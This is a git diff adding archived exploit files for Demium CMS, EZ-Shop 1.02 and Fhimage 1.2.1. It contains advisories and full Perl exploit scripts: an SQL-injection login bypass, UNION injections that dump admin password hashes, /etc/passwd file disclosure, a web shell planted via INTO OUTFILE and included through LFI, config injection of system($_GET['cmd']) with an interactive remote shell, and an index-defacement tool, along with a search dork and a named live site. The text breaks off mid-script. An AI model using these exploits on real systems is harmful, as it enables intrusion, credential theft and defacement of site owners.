+ $sql = "SELECT * FROM cms_profile WHERE profile_username = '$username' AND profile_password = '$pw' AND profile_aktiv=1;";
+ $result = mysql_query($sql);
+ $failure=true;
+ while($row = mysql_fetch_assoc($result))
+ {
+ $failure=false;
+ setcookie("login_pw", $pw, (time()+(60*60*24*365)));
+ setcookie("login_user", $username, (time()+(60*60*24*365)));
+ header("Location: /demium_beta_v.0.2.1//index_admin.php?loading=1");
+ }
+ }
+ [/CODE]
+
+ To exploit this vulnerability, and become Administrator, just put this in username form: admin_user' or '1=1
+ Where admin_user is the real nickname of the Administrator, by default: admin.
+
+[/0x01]
+
+[0x02 - Remote SQL Injection]
+
+ Multiple SQL Injection vulnerabilities found on this CMS. I just report the first one that I found. Needs Magic Quotes needs to be OFF
+ because this CMS doesn't stripslash on GET incoming data.
+
+ Vulnerable file is: /[path]/tracking.php
+ [CODE]
+
+
+
+ ' into outfile '/tmp/sh_spawn_ownz.txt
+
+ Exploit #1 will produce a GET request to a non existing file, since after the exploit the remote user will be redirected to host/sql_output/.html
+ Testing this SQL Injection in local I got redirected to this URL: http://localhost/admin:5f4dcc3b5aa765d61d8327deb882cf99/.html , producing the classic:
+ The requested URL /admin:5f4dcc3b5aa765d61d8327deb882cf99/.html was not found on this server.
+
+ Exploit #2 just create a file called "sh_spawn_ownz.txt" with "" as content, yes, a Remote Shell. With LFI vulnerability the remote user will
+ be able to include the created file and executes command.
+
+ Exploit provided at the end of the adviosory.
+
+
+[/0x02]
+
+[0x03 - Remote File Disclosure]
+
+ It's also vulnerable to File Disclore, with a GET request a remote user is able to read files content. It's not a file inclusion, but a fread
+ of a local file. Let's see the vulnerable code.
+
+ Vulnerable file is: /[path]/urheber.php
+ [CODE]
+ ", $contents);
+ echo $contents;
+ }
+ // Other code
+ [/CODE]
+
+ $fname comes directly from GET, without been cheeked before. From get we can se it's value, and adding a NULL BYTE %00 a remote user will
+ be able to read the content of the selected file.
+ Attach example: /[path]/urheber.php?name=../content.php%00
+ This request will show /[path]/content.php source code.
+ Attach example #2 : /[path]/urheber.php?name=../../../../../../../../../../etc/passwd%00
+
+[/0x03]
+
+[0x04 - Local File Inclusion]
+
+ This CMS, it's also affected to Local File Inclusion, a remote user will able to include and execute local file on the server.
+ I coded then a simple exploit to obtain a Remote Command Execution, creating a malicious file on the server, to include it then with the LFI.
+
+ Vulnerable file is: /[path]/content.php
+ [CODE]
+
+ [/CODE]
+
+ In case of remote user's user and password cookies, the script will include GET data, simple Perl sploit at the end of the advisory.
+
+[/0x04]
+
+
+
+#########
+Exploits section now.
+####
+
+
+[$$ - Local File Inclusion Exploit]
+
+#!/usr/bin/perl
+
+# LFI Sploit
+# by Osirys
+
+use IO::Socket;
+
+my $host = $ARGV[0];
+
+($host) || help("-1");
+cheek($host) == 1 || help("-2");
+&banner;
+
+$datas = get_input($host);
+$datas =~ /(.*) (.*)/;
+($h0st,$path) = ($1,$2);
+
+&exploit;
+
+sub exploit () {
+ print "\n[*] Include: ";
+ chomp($l_file = );
+
+ print "\n";
+ $l_file !~ /exit/ || die "Exiting ..";
+ if ($l_file !~ /%00^/) {
+ $l_file = $l_file."%00";
+ }
+
+ my $url = $path."/content.php?include=".$l_file;
+
+ my $data = "GET ".$url." HTTP/1.1\r\n".
+ "Host: ".$h0st."\r\n".
+ "Keep-Alive: 300\r\n".
+ "Connection: keep-alive\r\n".
+ "Content-Type: application/x-www-form-urlencoded\r\n".
+ "Cookie: login_user=p0wnin; login_pw=p0wnin\r\n".
+ "Content-Length: 0\r\n\r\n".
+ "\r\n";
+
+ my $socket = new IO::Socket::INET(
+ PeerAddr => $h0st,
+ PeerPort => '80',
+ Proto => 'tcp',
+ ) or die "[-] Can't connect to $h0st:80\n[?] $! \n\n";
+
+ $socket->send($data);
+
+ my $count = 0;
+ while (my $e = <$socket>) {
+ $count++;
+ if ($count > 9) {
+ chomp($e);
+ print "$e\n";
+ }
+ }
+
+ &exploit;
+}
+
+sub cheek() {
+ my $host = $_[0];
+ if ($host =~ /http:\/\/(.+)/) {
+ return 1;
+ }
+ else {
+ return 0;
+ }
+}
+
+sub get_input() {
+ my $host = $_[0];
+ $host =~ /http:\/\/(.+)/;
+ $s_host = $1;
+ $s_host =~ /([a-z.-]{1,30})\/(.*)/;
+ ($h0st,$path) = ($1,$2);
+ $path =~ s/(.*)/\/$1/;
+ $full_det = $h0st." ".$path;
+ return $full_det;
+}
+
+sub banner {
+ print "\n".
+ " --------------------------- \n".
+ " Demium CMS LFI sploit \n".
+ " by Osirys \n".
+ " --------------------------- \n\n";
+}
+
+sub help () {
+ my $error = $_[0];
+ if ($error == -1) {
+ &banner;
+ print "\n[-] Bad hostname! 
\n";
+ }
+ elsif ($error == -2) {
+ &banner;
+ print "\n[-] Bad hostname address !\n";
+ }
+ print "[*] Usage : perl $0 http://hostname/cms_path\n\n";
+ exit(0);
+}
+
+[/$$]
+
+
+
+
+
+
+
+[$$$ - Remote Command Execution Exploit via SQL Injection and Local File Inclusion (Works with mq Off)]
+
+#!/usr/bin/perl
+
+# RCE Exploit
+# Step 1 => Creating a remote Shell in /tmp via SQL Injection
+# Step 2 => Including via LFI remote Shell, executing your CMDs
+
+# by Giovanni Buzzin, Osirys
+
+# ----------------------------------------------------------------------------
+# Exploit in action [>!]
+# ----------------------------------------------------------------------------
+# osirys[~]>$ perl sp1.txt http://localhost/demium_beta_v.0.2.1/
+
+# ---------------------------
+# Demium CMS RCE sploit
+# (SQL-LFI)
+# by Osirys
+# ---------------------------
+
+# [*] Getting admin login details ..
+# [$] User: admin
+# [$] Pass: 5f4dcc3b5aa765d61d8327deb882cf99
+
+# [*] Creating remote Shell via SQL Injection ..
+# [*] Spawning remote Shell via LFI ..
+
+# shell[localhost]$> id
+# uid=80(apache) gid=80(apache) groups=80(apache)
+# shell[localhost]$> pwd
+# /home/osirys/web/demium_beta_v.0.2.1
+# shell[localhost]$> exit
+# [-] Quitting ..
+
+# osirys[~]>$
+# ----------------------------------------------------------------------------
+
+use IO::Socket;
+use LWP::UserAgent;
+
+my $host = $ARGV[0];
+my $rand = int(rand 50);
+
+($host) || help("-1");
+cheek($host) == 1 || help("-2");
+&banner;
+
+$datas = get_input($host);
+$datas =~ /(.*) (.*)/;
+($h0st,$path) = ($1,$2);
+
+print "[*] Getting admin login details ..\n";
+
+my $url = $host."/tracking.php?follow_kat=osirys' union select concat(profile_username,0x3a,profile_password) from cms_profile order by '*";
+my $re = get_req($url);
+if ($re =~ /replace\('\/(.+):(.+)\/.html/) {
+ $user = $1;
+ $pass = $2;
+ print "[\$] User: $user\n";
+ print "[\$] Pass: $pass\n";
+}
+else {
+ print "[-] Can't extract admin details\n\n";
+}
+
+print "\n[*] Creating remote Shell via SQL Injection ..\n";
+
+my $code = "";
+my $file = "/tmp/sh_spawn_ownzzzzz".$rand.".txt";
+my $attack = $host."/tracking.php?follow_kat=osirys' union select '".$code."' into outfile '".$file;
+get_req($attack);
+
+print "[*] Spawning remote Shell via LFI ..\n\n";
+&exploit;
+
+sub exploit {
+ my $file = "../../../../../../../../..".$file;
+ $h0st !~ /www\./ || $h0st =~ s/www\.//;
+ print "shell[$h0st]\$> ";
+ chomp($cmd = );
+ $cmd !~ /exit/ || die "[-] Quitting ..\n\n";
+
+ my $url = $path."/content.php?include=".$file."%00&cmd=".$cmd;
+
+ my $data = "GET ".$url." HTTP/1.1\r\n".
+ "Host: ".$h0st."\r\n".
+ "Keep-Alive: 300\r\n".
+ "Connection: keep-alive\r\n".
+ "Content-Type: application/x-www-form-urlencoded\r\n".
+ "Cookie: login_user=p0wnin; login_pw=p0wnin\r\n".
+ "Content-Length: 0\r\n\r\n".
+ "\r\n";
+
+ my $socket = new IO::Socket::INET(
+ PeerAddr => $h0st,
+ PeerPort => '80',
+ Proto => 'tcp',
+ ) or die "[-] Can't connect to $h0st:80\n[?] $! 
\n\n";
+
+ $socket->send($data);
+
+ my @tmp_out;
+ my $stop;
+ while ((my $e = <$socket>)&&($stop != 1)) {
+ if ($e =~ /ExeCx0/) {
+ $stop = 1;
+ }
+ push(@tmp_out,$e);
+ }
+
+ $stop == 1 || die "[-] Can't include remote Shell\n\n";
+
+ my $re = join '', @tmp_out;
+ my $content = tag($re);
+ if ($content =~ /0xExec(.+)\*ExeCx0/) {
+ my $out = $1;
+ $out =~ s/\$/ /g;
+ $out =~ s/\*/\n/g;
+ chomp($out);
+ print "$out\n";
+ &exploit;
+ }
+ else {
+ $c++;
+ $cmd =~ s/\n//;
+ print "bash: ".$cmd.": command not found\n";
+ $c < 3 || die "[-] Command are not executed.\n[-] Something wrong. Exploit Failed !\n\n";
+ &exploit;
+ }
+}
+
+sub get_req() {
+ $link = $_[0];
+ my $req = HTTP::Request->new(GET => $link);
+ my $ua = LWP::UserAgent->new();
+ $ua->timeout(4);
+ my $response = $ua->request($req);
+ return($response->content);
+}
+
+sub cheek() {
+ my $host = $_[0];
+ if ($host =~ /http:\/\/(.+)/) {
+ return 1;
+ }
+ else {
+ return 0;
+ }
+}
+
+sub get_input() {
+ my $host = $_[0];
+ $host =~ /http:\/\/(.+)/;
+ $s_host = $1;
+ $s_host =~ /([a-z.-]{1,30})\/(.*)/;
+ ($h0st,$path) = ($1,$2);
+ $path =~ s/(.*)/\/$1/;
+ $full_det = $h0st." ".$path;
+ return($full_det);
+}
+
+sub tag() {
+ my $string = $_[0];
+ $string =~ s/ /\$/g;
+ $string =~ s/\s/\*/g;
+ return($string);
+}
+
+sub banner {
+ print "\n".
+ " --------------------------- \n".
+ " Demium CMS RCE sploit \n".
+ " (SQL-LFI) \n".
+ " by Osirys \n".
+ " --------------------------- \n\n";
+}
+
+sub help() {
+ my $error = $_[0];
+ if ($error == -1) {
+ &banner;
+ print "\n[-] Bad hostname! \n";
+ }
+ elsif ($error == -2) {
+ &banner;
+ print "\n[-] Bad hostname address !\n";
+ }
+ print "[*] Usage : perl $0 http://hostname/cms_path\n\n";
+ exit(0);
+}
+
+[/$$$]
+
+# milw0rm.com [2009-02-27]
\ No newline at end of file
diff --git a/EZ-Shop 1.02 - Lateral SQL Injection.txt b/EZ-Shop 1.02 - Lateral SQL Injection.txt
new file mode 100644
index 0000000..03e3c1e
--- /dev/null
+++ b/EZ-Shop 1.02 - Lateral SQL Injection.txt
@@ -0,0 +1,221 @@
+[Security Advisory Details: 14/04/2011]
+
+[Script] EZ-Shop 1.02
+[Location] http://www.fcsoftware.co.uk/index.php?page=opensource
+[Vulnerability] SQL Injection
+[Original Adv] http://y-osirys.com/security/exploits/id28
+[Author] Giovanni Buzzin, "Osirys"
+[Site] y-osirys.com
+[Contact] osirys[at]autistici[dot]org
+
+Greets to: stratsec,senseofsecurity
+
+
+------------------------------------------------------------------------------------------------------------
+[CMS Description]
+
+EZ-Shop is a simple out of the box e-Commerce solution aimed at small startups and independant retailers
+looking to get into online trade. The system was initially designed to be simple and easy to use but with
+many features that more complex packages lack.
+
+
+
+------------------------------------------------------------------------------------------------------------
+[Security Flaw]
+
+EZ-Shop is prone to SQL Injection due to insufficent user supplied input sanization.
+
+[code:/specialoffer.php:line 249-283]
+
+
+
+
+
+ select($sql);
+ if(count($resgid)>0)
+ {
+ for($p=0;$p";
+ $prid=$resgid[$p]['intprodid'];
+ $sql6="select * from tblproddesc where intid='$prid'";
+ $resprname1=$obj_db->select($sql6);
+ if(count($resprname1)>0)
+ {
+ $desc=$resprname1[0]['txtdesc'];
+
+ $resprname1=$resprname1[0]['varprodname'];
+
+ }
+ else
+ {
+ $resprname1="";
+ }
+ $sql6="select * from tblproducts where intprodid='$prid'";
+
+ $resprname=$obj_db->select($sql6);
+ if(count($resprname)>0)
+ {
+ $proprice=$resprname[0]['decprice'];
+ ?>
+
+
+
+ + + + + + +
Products
+
+
+
+[/code]
+
+This vulnerability is kind of weird, since is an SQL Injection injected through a column result of another SQL Injection.
+The variable $speid comes from $_REQUEST, without being properly sanitized, here the Injection starts.
+
+QUERY 1: $sql="select * from tblprodgiftideas injectwhere intgiftideaid='$speid'";
+
+The result of this Query is not showed on the screen, but is sent to another query: QUERY 2.
+
+QUERY 2: $sql6="select * from tblproddesc where intid='$prid'";
+
+As we can see from this piece of code:
+
+[code]
+ $speid=$_REQUEST['specialid'];
+ $sql="select * from tblprodgiftideas where intgiftideaid='$speid'";
+ $resgid=$obj_db->select($sql);
+ if(count($resgid)>0)
+ {
+ for($p=0;$p";
+ $prid=$resgid[$p]['intprodid']; <---- prid
+ $sql6="select * from tblproddesc where intid='$prid'";
+[/code]
+
+This time the result of QUERY 2 is showed through :
+
+
+So basically, what we need to do is to inject a query into QUERY 1 that will give back as a result another SQL Injection, injected
+then into QUERY 2 through $prid.
+
+To do this, concat() mysql functions can become very helpful. Let's inject the second Injection as separator encrypted in hex.
+Ex: concat(hex(SQL_PART1),something,hex(SQL_PART2));
+something could be: @@version
+Since we don't want it to interfer with the Injection, we can comment it, updating the concat() in this way:
+
+SQL_PART1 : 1' union select 1,2,/* --> hex(SQL_PART1) = 0x312720756e696f6e2073656c65637420312c322c2f2a
+something : @@version
+SQL_PART" : */@@version,4,5# --> hex(SQL_PART2) = 0x2a2f404076657273696f6e2c342c3523
+
+Concat will be: concat(0x312720756e696f6e2073656c65637420312c322c2f2a,@@version,0x2a2f404076657273696f6e2c342c3523)
+
+mysql> select concat(0x312720756e696f6e2073656c65637420312c322c2f2a,@@version,0x2a2f404076657273696f6e2c342c3523);
++-----------------------------------------------------------------------------------------------------+
+| concat(0x312720756e696f6e2073656c65637420312c322c2f2a,@@version,0x2a2f404076657273696f6e2c342c3523) |
++-----------------------------------------------------------------------------------------------------+
+| 1' union select 1,2,/*5.1.49-1ubuntu8.1*/@@version,4,5# |
++-----------------------------------------------------------------------------------------------------+
+1 row in set (0.00 sec)
+
+mysql>
+
+Here is the Second Injection: 1' union select 1,2,/*5.1.49-1ubuntu8.1*/@@version,4,5#
+
+
+## Background Operation
+
+Injection 1 on QUERY 1: 1' union select 1,2,concat(0x312720756e696f6e2073656c65637420312c322c2f2a,@@vers
+ ion,0x2a2f404076657273696f6e2c342c3523)%23
+QUERY 1: select * from tblprodgiftideas where intgiftideaid='1' union select 1,2,concat(0
+ x312720756e696f6e2073656c65637420312c322c2f2a,@@version,0x2a2f404076657273696f6e
+ 2c342c3523)#'
+
+Backend Injection 2 on QUERY 2: 1' union select 1,2,/*5.1.49-1ubuntu8.1*/@@version,4,5#'
+QUERY 2: select * from tblproddesc where intid='1' union select 1
+ ,2,/*5.1.49-1ubuntu8.1*/@@version,4,5#'
+
+(5.1.49-1ubuntu8.1 is commented in order to not interfer with our query) ->
+-> union select 1,2,@@version,4,5
+
+That will finally show through $resprname1 our @@version:
5.1.49-1ubuntu8.1
+
+
+SQL Inection p0c:
+
+/[cms path]/specialoffer.php?specialid=1' union select 1,2,concat(0x312720756e696f6e2073656c6563742031
+2c322c2f2a,@@version,0x2a2f404076657273696f6e2c342c3523)%23
+
+
+Since administrations details are stored in tbladmin table:
+[tbladmin]:[intid,varadminfname,varadminname,varpassword,intstatus,varemail,ttLastLogginDate]
+
+Injection:
+
+SQL_PART1: 1' union select 1,2,/*
+ hex(SQL_PART1) = 0x312720756e696f6e2073656c65637420312c322c2f2a
+something: @@version
+SQL_PART1: */concat(0x3a,varadminname,0x3a,varpassword,0x3a,varemail,0x3a),4,5 from tbladmin#
+ hex(SQL_PART2) = 0x2a2f636f6e63617428307833612c76617261646d696e6e616d652
+ c307833612c76617270617373776f72642c307833612c766172656d
+ 61696c2c30783361292c342c352066726f6d2074626c61646d696e23
+
+concat(0x312720756e696f6e2073656c65637420312c322c2f2a,@@version,0x2a2f636f6e63617428
+307833612c76617261646d696e6e616d652c307833612c76617270617373776f72642c307833612c7661
+72656d61696c2c30783361292c342c352066726f6d2074626c61646d696e23)
+
+Final Injection:
+
+/specialoffer.php?specialid=1' union select 1,2,concat(0x312720756e696f6e2073656c65637
+420312c322c2f2a,@@version,0x2a2f636f6e63617428307833612c76617261646d696e6e616d652c3078
+33612c76617270617373776f72642c307833612c766172656d61696c2c30783361292c342c352066726f6d
+2074626c61646d696e23)%23
+
+That will show:
+
+:admin:21232f297a57a5a743894a0e4a801fc3:support@fcsoftware.co.uk:
+
+
+-> Owned
+
+
+
+------------------------------------------------------------------------------------------------------------
+[Exploit]
+
+MySQL Version p0c:
+
+[p0c]
+ /[cms path]/specialoffer.php?specialid=1' union select 1,2,concat(0x312720756e696f6e2073656c65637
+ 420312c322c2f2a,@@version,0x2a2f404076657273696f6e2c342c3523)%23
+[/p0c]
+
+Admin's details p0c:
+[p0c]
+ /[cms_path]/specialoffer.php?specialid=1' union select 1,2,concat(0x312720756e696f6e2073656c65637
+
420312c322c2f2a,@@version,0x2a2f636f6e63617428307833612c76617261646d696e6e616d652c307833612c76617
+ 270617373776f72642c307833612c766172656d61696c2c30783361292c342c352066726f6d2074626c61646d696e23)%23
+[/p0c]
+
+
+
+------------------------------------------------------------------------------------------------------------
+[Credits]
+
+Credit goes to Giovanni Buzzin, "Osirys" for the discover of this vulnerability.
+(Meglio)
+
+
+
+------------------------------------------------------------------------------------------------------------
+[END: 14/04/2011]
\ No newline at end of file
diff --git a/Fhimage 1.2.1 - Remote Command Execution.pl b/Fhimage 1.2.1 - Remote Command Execution.pl
new file mode 100644
index 0000000..17d7b34
--- /dev/null
+++ b/Fhimage 1.2.1 - Remote Command Execution.pl
@@ -0,0 +1,210 @@
+#!/usr/bin/perl
+
+# -----------------------------------------------------------------------------------------------
+# INFORMATIONS
+# -----------------------------------------------------------------------------------------------
+# Fhimage 1.2.1
+# http://www.flash-here.com/downloads/download.php?id=9
+# Remote Command Execution Exploit (mq = Off)
+# by Osirys
+# osirys[at]live[dot]it
+# osirys.org
+# Thanks: x0r
+
+# !! => This exploit works only with:
+# register_globals = On
+# magic_quotes_gpc = Off
+
+# Google Dork: FhImage, powered by Flash-here.com
+# Live : http://www.diandata.com/audi/photos/
+
+# --------------------------------------------------------------
+# Exploit in action :D
+# --------------------------------------------------------------
+# osirys[~]>$ perl rce.txt http://localhost/fhimage/
+#
+# ----------------------------------------------
+# Fhimage Remote Command Execution Exploit
+# Coded by Osirys
+# [*] Needs Magic Quotes Off
+# ----------------------------------------------
+#
+# [+] Configuration file found !
+# [+] Injecting php vulnerable code ..
+# [+] Injection succesfully !
+# [*] Hi my master, execute your commands !
+#
+# shell[localhost]$> whoami
+# apache
+# shell[localhost]$> id
+# uid=80(apache) gid=80(apache) groups=80(apache)
+# shell[localhost]$> exit
+# [-] Quitting ..
+# osirys[~]>$
+# --------------------------------------------------------------
+
+
+use HTTP::Request;
+use LWP::UserAgent;
+use IO::Socket;
+
+my $conf_path = "/imgconfig/index.php?mode=write";
+my $rce_path = "/settings.php";
+my $evil_code = "Click+to+view+the+larger+image%27%3Bsystem%28%24_GET%5B%27cmd%27%5D%29%3B%24lol+%3D+%27aa";
+
+my $host = $ARGV[0];
+
+($host) || help("-1");
+cheek($host) == 1 || help("-2");
+&banner;
+
+$datas = get_input($host);
+$datas =~ /(.*) (.*)/;
+($h0st,$path) = ($1,$2);
+
+$test_url = $host.$conf_path;
+$test_re = get_req($test_url);
+
+if ($test_re !~ /Config Settings/) {
+ print "[-] Configuration file not found, or insufficent permissions \n";
+ print "[-] Exploit failed ! \n";
+ exit(0);
+}
+else {
+ print "[+] Configuration file found ! \n";
+
+ get_old_data($test_url);
+ my $url = $path.$conf_path;
+
+ my $post = "g_title=" .$t. "&g_desc=".$evil_code. "&g_bgcolor=" .$g1."&g_titlecolor=".$g2."&g_".
+ "desccolor=".$g3."&g_textcolor=".$g4."&g_linkcolor=".$g5."&g_vlinkcolor=".$g6."&g_c".
+ "ols=".$g7."&g_rows=".$g8."&g_thumb_worh=".$g9."&g_twidth=".$g10."&g_spacing=". $g11.
+ "&g_dispFn=check&g_sortByFn=check&g_insensitive_sort=check&g_folderImg=&g_popupWidt".
+ "h=400&g_popupHeight=400";
+
+ my $length = length($post);
+
+ my $socket = new IO::Socket::INET(
+ PeerAddr => $h0st,
+ PeerPort => '80',
+ Proto => 'tcp',
+ ) or die "[-] Can't connect to $h0st:80\n[?] $! \n\n";
+
+ my $data = "POST ".$url." HTTP/1.1\r\n".
+ "Host: ".$h0st."\r\n".
+ "Keep-Alive: 300\r\n".
+ "Connection: keep-alive\r\n".
+ "Content-Type: application/x-www-form-urlencoded\r\n".
+ "Content-Length: ".$length."\r\n\r\n".
$post."\r\n";
+
+ print "[+] Injecting php vulnerable code ..\n";
+ $socket->send($data);
+
+ while ((my $e = <$socket>)&&($inj_t != 1)) {
+ if ($e =~ /Settings Saved/) {
+ print "[+] Injection succesfully !\n";
+ print "[*] Hi my master, execute your commands !\n\n";
+ $inj_t = 1;
+ }
+ }
+
+ $inj_t == 1 || die "[-] Unable to inject php code ! \n";
+
+ my $re = get_req($host."/imgconfig/index.php");
+ if ($re =~ /g_desc" size="50" value="Click to view the larger image';system\(\$_GET\['cmd']\);\$lol = 'aa">/) {
+ print "[+] Magic Quotes are ON. Exploit Failed\n\n";
+ exit(0);
+ }
+ &exec_cmd;
+}
+
+sub exec_cmd {
+ $h0st !~ /www\./ || $h0st =~ s/www\.//;
+ print "shell[$h0st]\$> ";
+ $cmd = ;
+ $cmd !~ /exit/ || die "[-] Quitting ..\n";
+ $exec_url = ($host.$rce_path."?cmd=".$cmd);
+ $re = get_req($exec_url);
+ if ($re =~ /(.*)/) {
+ my $cmd = $1;
+ print "$cmd\n";
+ &exec_cmd;
+ }
+ else {
+ print "[-] Undefined output or bad cmd !\n";
+ &exec_cmd;
+ }
+}
+
+sub get_req() {
+ $link = $_[0];
+ my $req = HTTP::Request->new(GET => $link);
+ my $ua = LWP::UserAgent->new();
+ $ua->timeout(4);
+ my $response = $ua->request($req);
+ return $response->content;
+}
+
+sub cheek() {
+ my $host = $_[0];
+ if ($host =~ /http:\/\/(.*)/) {
+ return 1;
+ }
+ else {
+ return 0;
+ }
+}
+
+sub get_input() {
+ my $host = $_[0];
+ $host =~ /http:\/\/(.*)/;
+ $s_host = $1;
+ $s_host =~ /([a-z.-]{1,30})\/(.*)/;
+ ($h0st,$path) = ($1,$2);
+ $path =~ s/(.*)/\/$1/;
+ $full_det = $h0st." 
".$path;
+ return $full_det;
+}
+
+sub get_old_data() {
+ my $url = $_[0];
+ my $re = &get_req($url);
+ if ($re =~ /name="g_title" size="50" value="(.*)">/) { $t = $1; }
+ if ($re =~ /g_bgcolor'\)" cols="7" maxlength="7" value="#([0-9a-zA-Z]{6})">/) { $g1 = "\%23".$1; }
+ if ($re =~ /g_titlecolor'\)" cols="7" maxlength="7" value="#([0-9a-zA-Z]{6})">/) { $g2 = "\%23".$1; }
+ if ($re =~ /g_desccolor'\)" cols="7" maxlength="7" value="#([0-9a-zA-Z]{6})">/) { $g3 = "\%23".$1; }
+ if ($re =~ /g_textcolor'\)" cols="7" maxlength="7" value="#([0-9a-zA-Z]{6})">/) { $g4 = "\%23".$1; }
+ if ($re =~ /g_linkcolor'\)" cols="7" maxlength="7" value="#([0-9a-zA-Z]{6})">/) { $g5 = "\%23".$1; }
+ if ($re =~ /g_vlinkcolor'\)" cols="7" maxlength="7" value="#([0-9a-zA-Z]{6})">/) { $g6 = "\%23".$1; }
+ if ($re =~ /g_cols" cols="50" value="([0-9]{1,3})"> /) { $g7 = $1; }
+ if ($re =~ /g_rows" cols="50" value="([0-9]{1,3})"> /) { $g8 = $1; }
+ if (($re =~ /g_thumb_worh" type="radio" value="w" checked >/)&&($re =~ /g_twidth" cols="50" value="([0-9]{1,5})">/)) { ($g9,$g10) = ("w",$1); }
+ if (($re =~ /g_thumb_worh" type="radio" value="h" checked >/)&&($re =~ /g_twidth" cols="50" value="([0-9]{1,5})">/)) { ($g9,$g10) = ("h",$1); }
+ if ($re =~ /g_spacing" type="text" id="g_spacing" value="([0-9]{1,5})">/) { $g11 = $1; }
+}
+
+sub banner {
+ print "\n".
+ " ---------------------------------------------- \n".
+ " Fhimage Remote Command Execution Exploit \n".
+ " Coded by Osirys \n".
+ " [*] Needs Magic Quotes Off \n".
+ " ---------------------------------------------- \n\n";
+}
+
+sub help() {
+ my $error = $_[0];
+ if ($error == -1) {
+ &banner;
+ print "\n[-] Bad hostname! \n";
+ }
+ elsif ($error == -2) {
+ &banner;
+ print "\n[-] Bad hostname address !\n";
+ }
+ print "[*] Usage : perl $0 http://hostname/cms_path\n\n";
+ exit(0);
+}
+
+# milw0rm.com [2009-01-19]
\ No newline at end of file
diff --git a/Fhimage 1.2.1 - Remote Index Change.pl b/Fhimage 1.2.1 - Remote Index Change.pl
new file mode 100644
index 0000000..bed1358
--- /dev/null
+++ b/Fhimage 1.2.1 - Remote Index Change.pl
@@ -0,0 +1,176 @@
+#!/usr/bin/perl
+
+# -----------------------------------------------------------------------------------------------
+# INFORMATIONS
+# -----------------------------------------------------------------------------------------------
+# Fhimage 1.2.1
+# http://www.flash-here.com/downloads/download.php?id=9
+# Remote Index Change Exploit
+# by Osirys
+# osirys[at]live[dot]it
+# osirys.org
+# Thanks: x0r
+
+# With this exploit, you will able to change index.php content
+
+## # ONLY FOR EDUCATIONAL PURPOSE. THE AUTHOR IS NOT RESPONSABLE OF ANY
+## # IMPROPERLY USE OF THIS EXPLOIT. USE IT AT YOUR OWN RISK !!
+
+# Google Dork: FhImage, powered by Flash-here.com
+
+
+use HTTP::Request;
+use LWP::UserAgent;
+use IO::Socket;
+
+my $conf_path = "/imgconfig/index.php?mode=write";
+my $index_PATH = "/index.php";
+
+
+my $host = $ARGV[0];
+my $string_to_inj = $ARGV[1];
+
+(($host)&&($string_to_inj)) || help("-1");
+cheek($host) == 1 || help("-2");
+&banner;
+
+$datas = get_input($host);
+$datas =~ /(.*) (.*)/;
+($h0st,$path) = ($1,$2);
+
+$test_url = $host.$conf_path;
+$test_re = get_req($test_url);
+
+if ($test_re !~ /Config Settings/) {
+ print "[-] Configuration file not found, or insufficent permissions \n";
+ print "[-] Exploit failed ! \n";
+ exit(0);
+}
+else {
+ print "[+] Configuration file found ! \n";
+
+ get_old_data($test_url);
+ my $url = $path.$conf_path;
+
+ my $post = "g_title=".$t."&g_desc=".$string_to_inj."&g_bgcolor=".$g1."&g_titlecolor=".$g2."&g_".
+ "desccolor=".$g3."&g_textcolor=".$g4."&g_linkcolor=".$g5."&g_vlinkcolor=".$g6."&g_c".
+ "ols=".$g7."&g_rows=".$g8."&g_thumb_worh=".$g9."&g_twidth=".$g10."&g_spacing=". $g11.
+ "&g_dispFn=check&g_sortByFn=check&g_insensitive_sort=check&g_folderImg=&g_popupWidt".
+ "h=400&g_popupHeight=400";
+
+ my $length = length($post);
+
+ my $socket = new IO::Socket::INET(
+ PeerAddr => $h0st,
+ PeerPort => '80',
+ Proto => 'tcp',
+ ) or die "[-] Can't connect to $h0st:80\n[?] $! 
\n\n";
+
+ my $data = "POST ".$url." HTTP/1.1\r\n".
+ "Host: ".$h0st."\r\n".
+ "Keep-Alive: 300\r\n".
+ "Connection: keep-alive\r\n".
+ "Content-Type: application/x-www-form-urlencoded\r\n".
+ "Content-Length: ".$length."\r\n\r\n".
+ $post."\r\n";
+
+ print "[+] Chaning index content ..\n";
+ $socket->send($data);
+
+ while ((my $e = <$socket>)&&($inj_t != 1)) {
+ if ($e =~ /Settings Saved/) {
+ $inj_t = 1;
+ }
+ }
+
+ $inj_t == 1 || die "[-] Unable to change index content ! \n";
+ &expl_cheek;
+}
+
+sub expl_cheek {
+ my $url = $host.$index_PATH;
+ my $re = get_req($url);
+ if ($re =~ /class="desc">$string_to_inj<\/div>/) {
+ print "[+] Exploit succesfull !\n";
+ print "[+] Index changed, go and have a look !\n";
+ exit(0);
+ }
+ else {
+ print "[-] Exploit failed\n";
+ print "[?] Something went wrong\n";
+ exit(0);
+ }
+}
+
+sub get_req() {
+ $link = $_[0];
+ my $req = HTTP::Request->new(GET => $link);
+ my $ua = LWP::UserAgent->new();
+ $ua->timeout(4);
+ my $response = $ua->request($req);
+ return $response->content;
+}
+
+sub cheek() {
+ my $host = $_[0];
+ if ($host =~ /http:\/\/(.*)/) {
+ return 1;
+ }
+ else {
+ return 0;
+ }
+}
+
+sub get_input() {
+ my $host = $_[0];
+ $host =~ /http:\/\/(.*)/;
+ $s_host = $1;
+ $s_host =~ /([a-z.-]{1,30})\/(.*)/;
+ ($h0st,$path) = ($1,$2);
+ $path =~ s/(.*)/\/$1/;
+ $full_det = $h0st." 
".$path;
+ return $full_det;
+}
+
+sub get_old_data() {
+ my $url = $_[0];
+ my $re = &get_req($url);
+ if ($re =~ /name="g_title" size="50" value="(.*)">/) { $t = $1; }
+ if ($re =~ /g_bgcolor'\)" cols="7" maxlength="7" value="#([0-9a-zA-Z]{6})">/) { $g1 = "\%23".$1; }
+ if ($re =~ /g_titlecolor'\)" cols="7" maxlength="7" value="#([0-9a-zA-Z]{6})">/) { $g2 = "\%23".$1; }
+ if ($re =~ /g_desccolor'\)" cols="7" maxlength="7" value="#([0-9a-zA-Z]{6})">/) { $g3 = "\%23".$1; }
+ if ($re =~ /g_textcolor'\)" cols="7" maxlength="7" value="#([0-9a-zA-Z]{6})">/) { $g4 = "\%23".$1; }
+ if ($re =~ /g_linkcolor'\)" cols="7" maxlength="7" value="#([0-9a-zA-Z]{6})">/) { $g5 = "\%23".$1; }
+ if ($re =~ /g_vlinkcolor'\)" cols="7" maxlength="7" value="#([0-9a-zA-Z]{6})">/) { $g6 = "\%23".$1; }
+ if ($re =~ /g_cols" cols="50" value="([0-9]{1,3})"> /) { $g7 = $1; }
+ if ($re =~ /g_rows" cols="50" value="([0-9]{1,3})"> /) { $g8 = $1; }
